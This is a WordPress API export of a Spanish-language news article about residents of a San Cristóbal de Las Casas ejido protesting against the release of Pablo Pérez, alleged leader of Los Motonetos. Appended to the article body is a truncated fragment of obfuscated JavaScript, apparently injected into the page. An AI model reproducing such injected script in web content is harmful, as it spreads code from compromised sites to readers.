{"id":6362,"date":"2022-11-04T04:49:16","date_gmt":"2022-11-04T04:49:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6362"},"modified":"2022-11-04T04:49:16","modified_gmt":"2022-11-04T04:49:16","slug":"piden-no-liberar-a-lider-de-los-motonetos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6362","title":{"rendered":"Piden no liberar a l\u00edder de los motonetos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-03-at-5.11.07-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-6363\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-03-at-5.11.07-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-03-at-5.11.07-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-03-at-5.11.07-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-03-at-5.11.07-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-03-at-5.11.07-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Habitantes del Ejido Cuxtitali El Pinar realizaron una manifestaci\u00f3n pac\u00edfica a las afueras del Palacio de Justicia de esta ciudad para pedir a las autoridades no liberar a Pablo P\u00e9rez, presunto l\u00edder de Los Motonetos, esto luego de que la Fiscal\u00eda General del Estado diera a conocer que fue vinculado a proceso por diversos delitos. Durante el mitin, participaron varios habitantes de Cuxtitali El Pinar, donde advirtieron no van a permitir la ilegalidad y violencia, y si bien Pablo P\u00e9rez tiene seguidores, son m\u00e1s en la comunidad los que exigen su derecho a vivir seguros, tranquilos, en paz, sin violencia y con respeto mutuo entre las personas y sus bienes. Pablo P\u00e9rez fue vinculado a proceso como probable responsable del delito de Homicidio Calificado cometido en San Crist\u00f3bal, por lo que invitaron a otros grupos de ciudadanos en comunidades, barrios y colonias de San Crist\u00f3bal \u201cpara organizarnos, actuar juntos y poner alto a la delincuencia organizada y a la impunidad en nuestro municipio\u201d. Asimismo, respaldaron el trabajo y dem\u00e1s instituciones de gobierno por la reciente detenci\u00f3n de Pablo P\u00e9rez S\u00e1ntiz, \u201cl\u00edder de uno de los grupos armados que han ocasionado violencia, inseguridad y muerte en San Crist\u00f3bal\u201d. Aseguran que los aliados de Pablo P\u00e9rez han manifestado p\u00fablicamente su apoyo \u201cusurpando funciones en nuestro ejido; ellos no tienen ninguna representaci\u00f3n legal ni leg\u00edtima en este Ejido. Ellos mismos se autonombraron con actas falsas de una asamblea general que jam\u00e1s se realiz\u00f3; la mayor parte de la poblaci\u00f3n de este Ejido no apoyamos la ilegalidad ni la violencia; por lo tanto nosotros no exigimos la liberaci\u00f3n de Pablo P\u00e9rez, al contrario exigimos la investigaci\u00f3n y el castigo correspondiente a toda persona que act\u00fae al margen de la Ley\u201d. Los que dicen ser representantes legales y leg\u00edtimos de la gran mayor\u00eda de la poblaci\u00f3n de este Ejido, exigieron la aplicaci\u00f3n de la Ley, el establecimiento del orden, la seguridad y la tranquilidad, \u201cas\u00ed como el desmantelamiento de los grupos armados que han causado mucho da\u00f1o a toda la poblaci\u00f3n de San Crist\u00f3bal por los constantes delitos que cometen amenazas, violencia, uso de armas de fuego, invasiones, ecocidios, secuestros, etc\u00e9tera\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Habitantes del Ejido Cuxtitali El Pinar realizaron una manifestaci\u00f3n pac\u00edfica a las afueras del Palacio de Justicia de esta ciudad para pedir a las autoridades no liberar a Pablo P\u00e9rez, presunto l\u00edder de Los Motonetos, esto luego de que la Fiscal\u00eda General del Estado diera a conocer que fue &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6363,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6362","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6362","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6362"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6362\/revisions"}],"predecessor-version":[{"id":6364,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6362\/revisions\/6364"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6363"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6362"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6362"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6362"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}